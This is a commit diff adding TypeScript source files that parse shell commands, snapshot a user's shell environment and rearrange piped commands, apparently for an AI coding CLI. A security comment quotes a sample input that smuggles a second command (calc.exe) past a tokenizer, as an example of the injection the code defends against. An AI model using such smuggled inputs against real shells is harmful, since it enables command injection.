init claude-code

This commit is contained in:
2026-04-01 17:32:37 +02:00
commit 73b208c009
1902 changed files with 513237 additions and 0 deletions
+318
View File
@@ -0,0 +1,318 @@
import memoize from 'lodash-es/memoize.js'
import {
extractOutputRedirections,
splitCommandWithOperators,
} from './commands.js'
import type { Node } from './parser.js'
import {
analyzeCommand,
type TreeSitterAnalysis,
} from './treeSitterAnalysis.js'
export type OutputRedirection = {
target: string
operator: '>' | '>>'
}
/**
* Interface for parsed command implementations.
* Both tree-sitter and regex fallback implementations conform to this.
*/
export interface IParsedCommand {
readonly originalCommand: string
toString(): string
getPipeSegments(): string[]
withoutOutputRedirections(): string
getOutputRedirections(): OutputRedirection[]
/**
* Returns tree-sitter analysis data if available.
* Returns null for the regex fallback implementation.
*/
getTreeSitterAnalysis(): TreeSitterAnalysis | null
}
/**
* @deprecated Legacy regex/shell-quote path. Only used when tree-sitter is
* unavailable. The primary gate is parseForSecurity (ast.ts).
*
* Regex-based fallback implementation using shell-quote parser.
* Used when tree-sitter is not available.
* Exported for testing purposes.
*/
export class RegexParsedCommand_DEPRECATED implements IParsedCommand {
readonly originalCommand: string
constructor(command: string) {
this.originalCommand = command
}
toString(): string {
return this.originalCommand
}
getPipeSegments(): string[] {
try {
const parts = splitCommandWithOperators(this.originalCommand)
const segments: string[] = []
let currentSegment: string[] = []
for (const part of parts) {
if (part === '|') {
if (currentSegment.length > 0) {
segments.push(currentSegment.join(' '))
currentSegment = []
}
} else {
currentSegment.push(part)
}
}
if (currentSegment.length > 0) {
segments.push(currentSegment.join(' '))
}
return segments.length > 0 ? segments : [this.originalCommand]
} catch {
return [this.originalCommand]
}
}
withoutOutputRedirections(): string {
if (!this.originalCommand.includes('>')) {
return this.originalCommand
}
const { commandWithoutRedirections, redirections } =
extractOutputRedirections(this.originalCommand)
return redirections.length > 0
? commandWithoutRedirections
: this.originalCommand
}
getOutputRedirections(): OutputRedirection[] {
const { redirections } = extractOutputRedirections(this.originalCommand)
return redirections
}
getTreeSitterAnalysis(): TreeSitterAnalysis | null {
return null
}
}
type RedirectionNode = OutputRedirection & {
startIndex: number
endIndex: number
}
function visitNodes(node: Node, visitor: (node: Node) => void): void {
visitor(node)
for (const child of node.children) {
visitNodes(child, visitor)
}
}
function extractPipePositions(rootNode: Node): number[] {
const pipePositions: number[] = []
visitNodes(rootNode, node => {
if (node.type === 'pipeline') {
for (const child of node.children) {
if (child.type === '|') {
pipePositions.push(child.startIndex)
}
}
}
})
// visitNodes is depth-first. For `a | b && c | d`, the outer `list` nests
// the second pipeline as a sibling of the first, so the outer `|` is
// visited before the inner one — positions arrive out of order.
// getPipeSegments iterates them to slice left-to-right, so sort here.
return pipePositions.sort((a, b) => a - b)
}
function extractRedirectionNodes(rootNode: Node): RedirectionNode[] {
const redirections: RedirectionNode[] = []
visitNodes(rootNode, node => {
if (node.type === 'file_redirect') {
const children = node.children
const op = children.find(c => c.type === '>' || c.type === '>>')
const target = children.find(c => c.type === 'word')
if (op && target) {
redirections.push({
startIndex: node.startIndex,
endIndex: node.endIndex,
target: target.text,
operator: op.type as '>' | '>>',
})
}
}
})
return redirections
}
class TreeSitterParsedCommand implements IParsedCommand {
readonly originalCommand: string
// Tree-sitter's startIndex/endIndex are UTF-8 byte offsets, but JS
// String.slice() uses UTF-16 code-unit indices. For ASCII they coincide;
// for multi-byte code points (e.g. `—` U+2014: 3 UTF-8 bytes, 1 code unit)
// they diverge and slicing the string directly lands mid-token. Slicing
// the UTF-8 Buffer with tree-sitter's byte offsets and decoding back to
// string is correct regardless of code-point width.
private readonly commandBytes: Buffer
private readonly pipePositions: number[]
private readonly redirectionNodes: RedirectionNode[]
private readonly treeSitterAnalysis: TreeSitterAnalysis
constructor(
command: string,
pipePositions: number[],
redirectionNodes: RedirectionNode[],
treeSitterAnalysis: TreeSitterAnalysis,
) {
this.originalCommand = command
this.commandBytes = Buffer.from(command, 'utf8')
this.pipePositions = pipePositions
this.redirectionNodes = redirectionNodes
this.treeSitterAnalysis = treeSitterAnalysis
}
toString(): string {
return this.originalCommand
}
getPipeSegments(): string[] {
if (this.pipePositions.length === 0) {
return [this.originalCommand]
}
const segments: string[] = []
let currentStart = 0
for (const pipePos of this.pipePositions) {
const segment = this.commandBytes
.subarray(currentStart, pipePos)
.toString('utf8')
.trim()
if (segment) {
segments.push(segment)
}
currentStart = pipePos + 1
}
const lastSegment = this.commandBytes
.subarray(currentStart)
.toString('utf8')
.trim()
if (lastSegment) {
segments.push(lastSegment)
}
return segments
}
withoutOutputRedirections(): string {
if (this.redirectionNodes.length === 0) return this.originalCommand
const sorted = [...this.redirectionNodes].sort(
(a, b) => b.startIndex - a.startIndex,
)
let result = this.commandBytes
for (const redir of sorted) {
result = Buffer.concat([
result.subarray(0, redir.startIndex),
result.subarray(redir.endIndex),
])
}
return result.toString('utf8').trim().replace(/\s+/g, ' ')
}
getOutputRedirections(): OutputRedirection[] {
return this.redirectionNodes.map(({ target, operator }) => ({
target,
operator,
}))
}
getTreeSitterAnalysis(): TreeSitterAnalysis {
return this.treeSitterAnalysis
}
}
const getTreeSitterAvailable = memoize(async (): Promise<boolean> => {
try {
const { parseCommand } = await import('./parser.js')
const testResult = await parseCommand('echo test')
return testResult !== null
} catch {
return false
}
})
/**
* Build a TreeSitterParsedCommand from a pre-parsed AST root. Lets callers
* that already have the tree skip the redundant native.parse that
* ParsedCommand.parse would do.
*/
export function buildParsedCommandFromRoot(
command: string,
root: Node,
): IParsedCommand {
const pipePositions = extractPipePositions(root)
const redirectionNodes = extractRedirectionNodes(root)
const analysis = analyzeCommand(root, command)
return new TreeSitterParsedCommand(
command,
pipePositions,
redirectionNodes,
analysis,
)
}
async function doParse(command: string): Promise<IParsedCommand | null> {
if (!command) return null
const treeSitterAvailable = await getTreeSitterAvailable()
if (treeSitterAvailable) {
try {
const { parseCommand } = await import('./parser.js')
const data = await parseCommand(command)
if (data) {
// Native NAPI parser returns plain JS objects (no WASM handles);
// nothing to free — extract directly.
return buildParsedCommandFromRoot(command, data.rootNode)
}
} catch {
// Fall through to regex implementation
}
}
// Fallback to regex implementation
return new RegexParsedCommand_DEPRECATED(command)
}
// Single-entry cache: legacy callers (bashCommandIsSafeAsync,
// buildSegmentWithoutRedirections) may call ParsedCommand.parse repeatedly
// with the same command string. Each parse() is ~1 native.parse + ~6 tree
// walks, so caching the most recent command skips the redundant work.
// Size-1 bound avoids leaking TreeSitterParsedCommand instances.
let lastCmd: string | undefined
let lastResult: Promise<IParsedCommand | null> | undefined
/**
* ParsedCommand provides methods for working with shell commands.
* Uses tree-sitter when available for quote-aware parsing,
* falls back to regex-based parsing otherwise.
*/
export const ParsedCommand = {
/**
* Parse a command string and return a ParsedCommand instance.
* Returns null if parsing fails completely.
*/
parse(command: string): Promise<IParsedCommand | null> {
if (command === lastCmd && lastResult !== undefined) {
return lastResult
}
lastCmd = command
lastResult = doParse(command)
return lastResult
},
}
+582
View File
@@ -0,0 +1,582 @@
import { execFile } from 'child_process'
import { execa } from 'execa'
import { mkdir, stat } from 'fs/promises'
import * as os from 'os'
import { join } from 'path'
import { logEvent } from 'src/services/analytics/index.js'
import { registerCleanup } from '../cleanupRegistry.js'
import { getCwd } from '../cwd.js'
import { logForDebugging } from '../debug.js'
import {
embeddedSearchToolsBinaryPath,
hasEmbeddedSearchTools,
} from '../embeddedTools.js'
import { getClaudeConfigHomeDir } from '../envUtils.js'
import { pathExists } from '../file.js'
import { getFsImplementation } from '../fsOperations.js'
import { logError } from '../log.js'
import { getPlatform } from '../platform.js'
import { ripgrepCommand } from '../ripgrep.js'
import { subprocessEnv } from '../subprocessEnv.js'
import { quote } from './shellQuote.js'
const LITERAL_BACKSLASH = '\\'
const SNAPSHOT_CREATION_TIMEOUT = 10000 // 10 seconds
/**
* Creates a shell function that invokes `binaryPath` with a specific argv[0].
* This uses the bun-internal ARGV0 dispatch trick: the bun binary checks its
* argv[0] and runs the embedded tool (rg, bfs, ugrep) that matches.
*
* @param prependArgs - Arguments to inject before the user's args (e.g.,
* default flags). Injected literally; each element must be a valid shell
* word (no spaces/special chars).
*/
function createArgv0ShellFunction(
funcName: string,
argv0: string,
binaryPath: string,
prependArgs: string[] = [],
): string {
const quotedPath = quote([binaryPath])
const argSuffix =
prependArgs.length > 0 ? `${prependArgs.join(' ')} "$@"` : '"$@"'
return [
`function ${funcName} {`,
' if [[ -n $ZSH_VERSION ]]; then',
` ARGV0=${argv0} ${quotedPath} ${argSuffix}`,
' elif [[ "$OSTYPE" == "msys" ]] || [[ "$OSTYPE" == "cygwin" ]] || [[ "$OSTYPE" == "win32" ]]; then',
// On Windows (git bash), exec -a does not work, so use ARGV0 env var instead
// The bun binary reads from ARGV0 natively to set argv[0]
` ARGV0=${argv0} ${quotedPath} ${argSuffix}`,
' elif [[ $BASHPID != $$ ]]; then',
` exec -a ${argv0} ${quotedPath} ${argSuffix}`,
' else',
` (exec -a ${argv0} ${quotedPath} ${argSuffix})`,
' fi',
'}',
].join('\n')
}
/**
* Creates ripgrep shell integration (alias or function)
* @returns Object with type and the shell snippet to use
*/
export function createRipgrepShellIntegration(): {
type: 'alias' | 'function'
snippet: string
} {
const rgCommand = ripgrepCommand()
// For embedded ripgrep (bun-internal), we need a shell function that sets argv0
if (rgCommand.argv0) {
return {
type: 'function',
snippet: createArgv0ShellFunction(
'rg',
rgCommand.argv0,
rgCommand.rgPath,
),
}
}
// For regular ripgrep, use a simple alias target
const quotedPath = quote([rgCommand.rgPath])
const quotedArgs = rgCommand.rgArgs.map(arg => quote([arg]))
const aliasTarget =
rgCommand.rgArgs.length > 0
? `${quotedPath} ${quotedArgs.join(' ')}`
: quotedPath
return { type: 'alias', snippet: aliasTarget }
}
/**
* VCS directories to exclude from grep searches. Matches the list in
* GrepTool (see GrepTool.ts: VCS_DIRECTORIES_TO_EXCLUDE).
*/
const VCS_DIRECTORIES_TO_EXCLUDE = [
'.git',
'.svn',
'.hg',
'.bzr',
'.jj',
'.sl',
] as const
/**
* Creates shell integration for `find` and `grep`, backed by bfs and ugrep
* embedded in the bun binary (ant-native only). Unlike the rg integration,
* this always shadows the system find/grep since bfs/ugrep are drop-in
* replacements and we want consistent fast behavior.
*
* These wrappers replace the GlobTool/GrepTool dedicated tools (which are
* removed from the tool registry when embedded search tools are available),
* so they're tuned to match those tools' semantics, not GNU find/grep.
*
* `find` ↔ GlobTool:
* - Inject `-regextype findutils-default`: bfs defaults to POSIX BRE for
* -regex, but GNU find defaults to emacs-flavor (which supports `\|`
* alternation). Without this, `find . -regex '.*\.\(js\|ts\)'` silently
* returns zero results. A later user-supplied -regextype still overrides.
* - No gitignore filtering: GlobTool passes `--no-ignore` to rg. bfs has no
* gitignore support anyway, so this matches by default.
* - Hidden files included: both GlobTool (`--hidden`) and bfs's default.
*
* Caveat: even with findutils-default, Oniguruma (bfs's regex engine) uses
* leftmost-first alternation, not POSIX leftmost-longest. Patterns where
* one alternative is a prefix of another (e.g., `\(ts\|tsx\)`) may miss
* matches that GNU find catches. Workaround: put the longer alternative first.
*
* `grep` ↔ GrepTool (file filtering) + GNU grep (regex syntax):
* - `-G` (basic regex / BRE): GNU grep defaults to BRE where `\|` is
* alternation. ugrep defaults to ERE where `|` is alternation and `\|` is a
* literal pipe. Without -G, `grep "foo\|bar"` silently returns zero results.
* User-supplied `-E`, `-F`, or `-P` later in argv overrides this.
* - `--ignore-files`: respect .gitignore (GrepTool uses rg's default, which
* respects gitignore). Override with `grep --no-ignore-files`.
* - `--hidden`: include hidden files (GrepTool passes `--hidden` to rg).
* Override with `grep --no-hidden`.
* - `--exclude-dir` for VCS dirs: GrepTool passes `--glob '!.git'` etc. to rg.
* - `-I`: skip binary files. rg's recursion silently skips binary matches
* by default (different from direct-file-arg behavior); ugrep doesn't, so
* we inject -I to match. Override with `grep -a`.
*
* Not replicated from GrepTool:
* - `--max-columns 500`: ugrep's `--width` hard-truncates output which could
* break pipelines; rg's version replaces the line with a placeholder.
* - Read deny rules / plugin cache exclusions: require toolPermissionContext
* which isn't available at shell-snapshot creation time.
*
* Returns null if embedded search tools are not available in this build.
*/
export function createFindGrepShellIntegration(): string | null {
if (!hasEmbeddedSearchTools()) {
return null
}
const binaryPath = embeddedSearchToolsBinaryPath()
return [
// User shell configs may define aliases like `alias find=gfind` or
// `alias grep=ggrep` (common on macOS with Homebrew GNU tools). The
// snapshot sources user aliases before these function definitions, and
// bash expands aliases before function lookup — so a renaming alias
// would silently bypass the embedded bfs/ugrep dispatch. Clear them first
// (same fix the rg integration uses).
'unalias find 2>/dev/null || true',
'unalias grep 2>/dev/null || true',
createArgv0ShellFunction('find', 'bfs', binaryPath, [
'-regextype',
'findutils-default',
]),
createArgv0ShellFunction('grep', 'ugrep', binaryPath, [
'-G',
'--ignore-files',
'--hidden',
'-I',
...VCS_DIRECTORIES_TO_EXCLUDE.map(d => `--exclude-dir=${d}`),
]),
].join('\n')
}
function getConfigFile(shellPath: string): string {
const fileName = shellPath.includes('zsh')
? '.zshrc'
: shellPath.includes('bash')
? '.bashrc'
: '.profile'
const configPath = join(os.homedir(), fileName)
return configPath
}
/**
* Generates user-specific snapshot content (functions, options, aliases)
* This content is derived from the user's shell configuration file
*/
function getUserSnapshotContent(configFile: string): string {
const isZsh = configFile.endsWith('.zshrc')
let content = ''
// User functions
if (isZsh) {
content += `
echo "# Functions" >> "$SNAPSHOT_FILE"
# Force autoload all functions first
typeset -f > /dev/null 2>&1
# Now get user function names - filter completion functions (single underscore prefix)
# but keep double-underscore helpers (e.g. __zsh_like_cd from mise, __pyenv_init)
typeset +f | grep -vE '^_[^_]' | while read func; do
typeset -f "$func" >> "$SNAPSHOT_FILE"
done
`
} else {
content += `
echo "# Functions" >> "$SNAPSHOT_FILE"
# Force autoload all functions first
declare -f > /dev/null 2>&1
# Now get user function names - filter completion functions (single underscore prefix)
# but keep double-underscore helpers (e.g. __zsh_like_cd from mise, __pyenv_init)
declare -F | cut -d' ' -f3 | grep -vE '^_[^_]' | while read func; do
# Encode the function to base64, preserving all special characters
encoded_func=$(declare -f "$func" | base64 )
# Write the function definition to the snapshot
echo "eval ${LITERAL_BACKSLASH}"${LITERAL_BACKSLASH}$(echo '$encoded_func' | base64 -d)${LITERAL_BACKSLASH}" > /dev/null 2>&1" >> "$SNAPSHOT_FILE"
done
`
}
// Shell options
if (isZsh) {
content += `
echo "# Shell Options" >> "$SNAPSHOT_FILE"
setopt | sed 's/^/setopt /' | head -n 1000 >> "$SNAPSHOT_FILE"
`
} else {
content += `
echo "# Shell Options" >> "$SNAPSHOT_FILE"
shopt -p | head -n 1000 >> "$SNAPSHOT_FILE"
set -o | grep "on" | awk '{print "set -o " $1}' | head -n 1000 >> "$SNAPSHOT_FILE"
echo "shopt -s expand_aliases" >> "$SNAPSHOT_FILE"
`
}
// User aliases
content += `
echo "# Aliases" >> "$SNAPSHOT_FILE"
# Filter out winpty aliases on Windows to avoid "stdin is not a tty" errors
# Git Bash automatically creates aliases like "alias node='winpty node.exe'" for
# programs that need Win32 Console in mintty, but winpty fails when there's no TTY
if [[ "$OSTYPE" == "msys" ]] || [[ "$OSTYPE" == "cygwin" ]]; then
alias | grep -v "='winpty " | sed 's/^alias //g' | sed 's/^/alias -- /' | head -n 1000 >> "$SNAPSHOT_FILE"
else
alias | sed 's/^alias //g' | sed 's/^/alias -- /' | head -n 1000 >> "$SNAPSHOT_FILE"
fi
`
return content
}
/**
* Generates Claude Code specific snapshot content
* This content is always included regardless of user configuration
*/
async function getClaudeCodeSnapshotContent(): Promise<string> {
// Get the appropriate PATH based on platform
let pathValue = process.env.PATH
if (getPlatform() === 'windows') {
// On Windows with git-bash, read the Cygwin PATH
const cygwinResult = await execa('echo $PATH', {
shell: true,
reject: false,
})
if (cygwinResult.exitCode === 0 && cygwinResult.stdout) {
pathValue = cygwinResult.stdout.trim()
}
// Fall back to process.env.PATH if we can't get Cygwin PATH
}
const rgIntegration = createRipgrepShellIntegration()
let content = ''
// Check if rg is available, if not create an alias/function to bundled ripgrep
// We use a subshell to unalias rg before checking, so that user aliases like
// `alias rg='rg --smart-case'` don't shadow the real binary check. The subshell
// ensures we don't modify the user's aliases in the parent shell.
content += `
# Check for rg availability
echo "# Check for rg availability" >> "$SNAPSHOT_FILE"
echo "if ! (unalias rg 2>/dev/null; command -v rg) >/dev/null 2>&1; then" >> "$SNAPSHOT_FILE"
`
if (rgIntegration.type === 'function') {
// For embedded ripgrep, write the function definition using heredoc
content += `
cat >> "$SNAPSHOT_FILE" << 'RIPGREP_FUNC_END'
${rgIntegration.snippet}
RIPGREP_FUNC_END
`
} else {
// For regular ripgrep, write a simple alias
const escapedSnippet = rgIntegration.snippet.replace(/'/g, "'\\''")
content += `
echo ' alias rg='"'${escapedSnippet}'" >> "$SNAPSHOT_FILE"
`
}
content += `
echo "fi" >> "$SNAPSHOT_FILE"
`
// For ant-native builds, shadow find/grep with bfs/ugrep embedded in the bun
// binary. Unlike rg (which only activates if system rg is absent), we always
// shadow find/grep since bfs/ugrep are drop-in replacements and we want
// consistent fast behavior in Claude's shell.
const findGrepIntegration = createFindGrepShellIntegration()
if (findGrepIntegration !== null) {
content += `
# Shadow find/grep with embedded bfs/ugrep (ant-native only)
echo "# Shadow find/grep with embedded bfs/ugrep" >> "$SNAPSHOT_FILE"
cat >> "$SNAPSHOT_FILE" << 'FIND_GREP_FUNC_END'
${findGrepIntegration}
FIND_GREP_FUNC_END
`
}
// Add PATH to the file
content += `
# Add PATH to the file
echo "export PATH=${quote([pathValue || ''])}" >> "$SNAPSHOT_FILE"
`
return content
}
/**
* Creates the appropriate shell script for capturing environment
*/
async function getSnapshotScript(
shellPath: string,
snapshotFilePath: string,
configFileExists: boolean,
): Promise<string> {
const configFile = getConfigFile(shellPath)
const isZsh = configFile.endsWith('.zshrc')
// Generate the user content and Claude Code content
const userContent = configFileExists
? getUserSnapshotContent(configFile)
: !isZsh
? // we need to manually force alias expansion in bash - normally `getUserSnapshotContent` takes care of this
'echo "shopt -s expand_aliases" >> "$SNAPSHOT_FILE"'
: ''
const claudeCodeContent = await getClaudeCodeSnapshotContent()
const script = `SNAPSHOT_FILE=${quote([snapshotFilePath])}
${configFileExists ? `source "${configFile}" < /dev/null` : '# No user config file to source'}
# First, create/clear the snapshot file
echo "# Snapshot file" >| "$SNAPSHOT_FILE"
# When this file is sourced, we first unalias to avoid conflicts
# This is necessary because aliases get "frozen" inside function definitions at definition time,
# which can cause unexpected behavior when functions use commands that conflict with aliases
echo "# Unset all aliases to avoid conflicts with functions" >> "$SNAPSHOT_FILE"
echo "unalias -a 2>/dev/null || true" >> "$SNAPSHOT_FILE"
${userContent}
${claudeCodeContent}
# Exit silently on success, only report errors
if [ ! -f "$SNAPSHOT_FILE" ]; then
echo "Error: Snapshot file was not created at $SNAPSHOT_FILE" >&2
exit 1
fi
`
return script
}
/**
* Creates and saves the shell environment snapshot by loading the user's shell configuration
*
* This function is a critical part of Claude CLI's shell integration strategy. It:
*
* 1. Identifies the user's shell config file (.zshrc, .bashrc, etc.)
* 2. Creates a temporary script that sources this configuration file
* 3. Captures the resulting shell environment state including:
* - Functions defined in the user's shell configuration
* - Shell options and settings that affect command behavior
* - Aliases that the user has defined
*
* The snapshot is saved to a temporary file that can be sourced by subsequent shell
* commands, ensuring they run with the user's expected environment, aliases, and functions.
*
* This approach allows Claude CLI to execute commands as if they were run in the user's
* interactive shell, while avoiding the overhead of creating a new login shell for each command.
* It handles both Bash and Zsh shells with their different syntax for functions, options, and aliases.
*
* If the snapshot creation fails (e.g., timeout, permissions issues), the CLI will still
* function but without the user's custom shell environment, potentially missing aliases
* and functions the user relies on.
*
* @returns Promise that resolves to the snapshot file path or undefined if creation failed
*/
export const createAndSaveSnapshot = async (
binShell: string,
): Promise<string | undefined> => {
const shellType = binShell.includes('zsh')
? 'zsh'
: binShell.includes('bash')
? 'bash'
: 'sh'
logForDebugging(`Creating shell snapshot for ${shellType} (${binShell})`)
return new Promise(async resolve => {
try {
const configFile = getConfigFile(binShell)
logForDebugging(`Looking for shell config file: ${configFile}`)
const configFileExists = await pathExists(configFile)
if (!configFileExists) {
logForDebugging(
`Shell config file not found: ${configFile}, creating snapshot with Claude Code defaults only`,
)
}
// Create unique snapshot path with timestamp and random ID
const timestamp = Date.now()
const randomId = Math.random().toString(36).substring(2, 8)
const snapshotsDir = join(getClaudeConfigHomeDir(), 'shell-snapshots')
logForDebugging(`Snapshots directory: ${snapshotsDir}`)
const shellSnapshotPath = join(
snapshotsDir,
`snapshot-${shellType}-${timestamp}-${randomId}.sh`,
)
// Ensure snapshots directory exists
await mkdir(snapshotsDir, { recursive: true })
const snapshotScript = await getSnapshotScript(
binShell,
shellSnapshotPath,
configFileExists,
)
logForDebugging(`Creating snapshot at: ${shellSnapshotPath}`)
logForDebugging(`Execution timeout: ${SNAPSHOT_CREATION_TIMEOUT}ms`)
execFile(
binShell,
['-c', '-l', snapshotScript],
{
env: {
...((process.env.CLAUDE_CODE_DONT_INHERIT_ENV
? {}
: subprocessEnv()) as typeof process.env),
SHELL: binShell,
GIT_EDITOR: 'true',
CLAUDECODE: '1',
},
timeout: SNAPSHOT_CREATION_TIMEOUT,
maxBuffer: 1024 * 1024, // 1MB buffer
encoding: 'utf8',
},
async (error, stdout, stderr) => {
if (error) {
const execError = error as Error & {
killed?: boolean
signal?: string
code?: number
}
logForDebugging(`Shell snapshot creation failed: ${error.message}`)
logForDebugging(`Error details:`)
logForDebugging(` - Error code: ${execError?.code}`)
logForDebugging(` - Error signal: ${execError?.signal}`)
logForDebugging(` - Error killed: ${execError?.killed}`)
logForDebugging(` - Shell path: ${binShell}`)
logForDebugging(` - Config file: ${getConfigFile(binShell)}`)
logForDebugging(` - Config file exists: ${configFileExists}`)
logForDebugging(` - Working directory: ${getCwd()}`)
logForDebugging(` - Claude home: ${getClaudeConfigHomeDir()}`)
logForDebugging(`Full snapshot script:\n${snapshotScript}`)
if (stdout) {
logForDebugging(
`stdout output (${stdout.length} chars):\n${stdout}`,
)
} else {
logForDebugging(`No stdout output captured`)
}
if (stderr) {
logForDebugging(
`stderr output (${stderr.length} chars): ${stderr}`,
)
} else {
logForDebugging(`No stderr output captured`)
}
logError(
new Error(`Failed to create shell snapshot: ${error.message}`),
)
// Convert signal name to number if present
const signalNumber = execError?.signal
? os.constants.signals[
execError.signal as keyof typeof os.constants.signals
]
: undefined
logEvent('tengu_shell_snapshot_failed', {
stderr_length: stderr?.length || 0,
has_error_code: !!execError?.code,
error_signal_number: signalNumber,
error_killed: execError?.killed,
})
resolve(undefined)
} else {
let snapshotSize: number | undefined
try {
snapshotSize = (await stat(shellSnapshotPath)).size
} catch {
// Snapshot file not found
}
if (snapshotSize !== undefined) {
logForDebugging(
`Shell snapshot created successfully (${snapshotSize} bytes)`,
)
// Register cleanup to remove snapshot on graceful shutdown
registerCleanup(async () => {
try {
await getFsImplementation().unlink(shellSnapshotPath)
logForDebugging(
`Cleaned up session snapshot: ${shellSnapshotPath}`,
)
} catch (error) {
logForDebugging(
`Error cleaning up session snapshot: ${error}`,
)
}
})
resolve(shellSnapshotPath)
} else {
logForDebugging(
`Shell snapshot file not found after creation: ${shellSnapshotPath}`,
)
logForDebugging(
`Checking if parent directory still exists: ${snapshotsDir}`,
)
try {
const dirContents =
await getFsImplementation().readdir(snapshotsDir)
logForDebugging(
`Directory contains ${dirContents.length} files`,
)
} catch {
logForDebugging(
`Parent directory does not exist or is not accessible: ${snapshotsDir}`,
)
}
logEvent('tengu_shell_unknown_error', {})
resolve(undefined)
}
}
},
)
} catch (error) {
logForDebugging(`Unexpected error during snapshot creation: ${error}`)
if (error instanceof Error) {
logForDebugging(`Error stack trace: ${error.stack}`)
}
logError(error)
logEvent('tengu_shell_snapshot_error', {})
resolve(undefined)
}
})
}
+2679
View File
File diff suppressed because it is too large Load Diff
File diff suppressed because it is too large Load Diff
+294
View File
@@ -0,0 +1,294 @@
import {
hasMalformedTokens,
hasShellQuoteSingleQuoteBug,
type ParseEntry,
quote,
tryParseShellCommand,
} from './shellQuote.js'
/**
* Rearranges a command with pipes to place stdin redirect after the first command.
* This fixes an issue where eval treats the entire piped command as a single unit,
* causing the stdin redirect to apply to eval itself rather than the first command.
*/
export function rearrangePipeCommand(command: string): string {
// Skip if command has backticks - shell-quote doesn't handle them well
if (command.includes('`')) {
return quoteWithEvalStdinRedirect(command)
}
// Skip if command has command substitution - shell-quote parses $() incorrectly,
// treating ( and ) as separate operators instead of recognizing command substitution
if (command.includes('$(')) {
return quoteWithEvalStdinRedirect(command)
}
// Skip if command references shell variables ($VAR, ${VAR}). shell-quote's parse()
// expands these to empty string when no env is passed, silently dropping the
// reference. Even if we preserved the token via an env function, quote() would
// then escape the $ during rebuild, preventing runtime expansion. See #9732.
if (/\$[A-Za-z_{]/.test(command)) {
return quoteWithEvalStdinRedirect(command)
}
// Skip if command contains bash control structures (for/while/until/if/case/select)
// shell-quote cannot parse these correctly and will incorrectly find pipes inside
// the control structure body, breaking the command when rearranged
if (containsControlStructure(command)) {
return quoteWithEvalStdinRedirect(command)
}
// Join continuation lines before parsing: shell-quote doesn't handle \<newline>
// and produces empty string tokens for each occurrence, causing spurious empty
// arguments in the reconstructed command
const joined = joinContinuationLines(command)
// shell-quote treats bare newlines as whitespace, not command separators.
// Parsing+rebuilding 'cmd1 | head\ncmd2 | grep' yields 'cmd1 | head cmd2 | grep',
// silently merging pipelines. Line-continuation (\<newline>) is already stripped
// above; any remaining newline is a real separator. Bail to the eval fallback,
// which preserves the newline inside a single-quoted arg. See #32515.
if (joined.includes('\n')) {
return quoteWithEvalStdinRedirect(command)
}
// SECURITY: shell-quote treats \' inside single quotes as an escape, but
// bash treats it as literal \ followed by a closing quote. The pattern
// '\' <payload> '\' makes shell-quote merge <payload> into the quoted
// string, hiding operators like ; from the token stream. Rebuilding from
// that merged token can expose the operators when bash re-parses.
if (hasShellQuoteSingleQuoteBug(joined)) {
return quoteWithEvalStdinRedirect(command)
}
const parseResult = tryParseShellCommand(joined)
// If parsing fails (malformed syntax), fall back to quoting the whole command
if (!parseResult.success) {
return quoteWithEvalStdinRedirect(command)
}
const parsed = parseResult.tokens
// SECURITY: shell-quote tokenizes differently from bash. Input like
// `echo {"hi":\"hi;calc.exe"}` is a bash syntax error (unbalanced quote),
// but shell-quote parses it into tokens with `;` as an operator and
// `calc.exe` as a separate word. Rebuilding from those tokens produces
// valid bash that executes `calc.exe` — turning a syntax error into an
// injection. Unbalanced delimiters in a string token signal this
// misparsing; fall back to whole-command quoting, which preserves the
// original (bash then rejects it with the same syntax error it would have
// raised without us).
if (hasMalformedTokens(joined, parsed)) {
return quoteWithEvalStdinRedirect(command)
}
const firstPipeIndex = findFirstPipeOperator(parsed)
if (firstPipeIndex <= 0) {
return quoteWithEvalStdinRedirect(command)
}
// Rebuild: first_command < /dev/null | rest_of_pipeline
const parts = [
...buildCommandParts(parsed, 0, firstPipeIndex),
'< /dev/null',
...buildCommandParts(parsed, firstPipeIndex, parsed.length),
]
return singleQuoteForEval(parts.join(' '))
}
/**
* Finds the index of the first pipe operator in parsed shell command
*/
function findFirstPipeOperator(parsed: ParseEntry[]): number {
for (let i = 0; i < parsed.length; i++) {
const entry = parsed[i]
if (isOperator(entry, '|')) {
return i
}
}
return -1
}
/**
* Builds command parts from parsed entries, handling strings and operators.
* Special handling for file descriptor redirections to preserve them as single units.
*/
function buildCommandParts(
parsed: ParseEntry[],
start: number,
end: number,
): string[] {
const parts: string[] = []
// Track if we've seen a non-env-var string token yet
// Environment variables are only valid at the start of a command
let seenNonEnvVar = false
for (let i = start; i < end; i++) {
const entry = parsed[i]
// Check for file descriptor redirections (e.g., 2>&1, 2>/dev/null)
if (
typeof entry === 'string' &&
/^[012]$/.test(entry) &&
i + 2 < end &&
isOperator(parsed[i + 1])
) {
const op = parsed[i + 1] as { op: string }
const target = parsed[i + 2]
// Handle 2>&1 style redirections
if (
op.op === '>&' &&
typeof target === 'string' &&
/^[012]$/.test(target)
) {
parts.push(`${entry}>&${target}`)
i += 2
continue
}
// Handle 2>/dev/null style redirections
if (op.op === '>' && target === '/dev/null') {
parts.push(`${entry}>/dev/null`)
i += 2
continue
}
// Handle 2> &1 style (space between > and &1)
if (
op.op === '>' &&
typeof target === 'string' &&
target.startsWith('&')
) {
const fd = target.slice(1)
if (/^[012]$/.test(fd)) {
parts.push(`${entry}>&${fd}`)
i += 2
continue
}
}
}
// Handle regular entries
if (typeof entry === 'string') {
// Environment variable assignments are only valid at the start of a command,
// before any non-env-var tokens (the actual command and its arguments)
const isEnvVar = !seenNonEnvVar && isEnvironmentVariableAssignment(entry)
if (isEnvVar) {
// For env var assignments, we need to preserve the = but quote the value if needed
// Split into name and value parts
const eqIndex = entry.indexOf('=')
const name = entry.slice(0, eqIndex)
const value = entry.slice(eqIndex + 1)
// Quote the value part to handle spaces and special characters
const quotedValue = quote([value])
parts.push(`${name}=${quotedValue}`)
} else {
// Once we see a non-env-var string, all subsequent strings are arguments
seenNonEnvVar = true
parts.push(quote([entry]))
}
} else if (isOperator(entry)) {
// Special handling for glob operators
if (entry.op === 'glob' && 'pattern' in entry) {
// Don't quote glob patterns - they need to remain as-is for shell expansion
parts.push(entry.pattern as string)
} else {
parts.push(entry.op)
// Reset after command separators - the next command can have its own env vars
if (isCommandSeparator(entry.op)) {
seenNonEnvVar = false
}
}
}
}
return parts
}
/**
* Checks if a string is an environment variable assignment (VAR=value)
* Environment variable names must start with letter or underscore,
* followed by letters, numbers, or underscores
*/
function isEnvironmentVariableAssignment(str: string): boolean {
return /^[A-Za-z_][A-Za-z0-9_]*=/.test(str)
}
/**
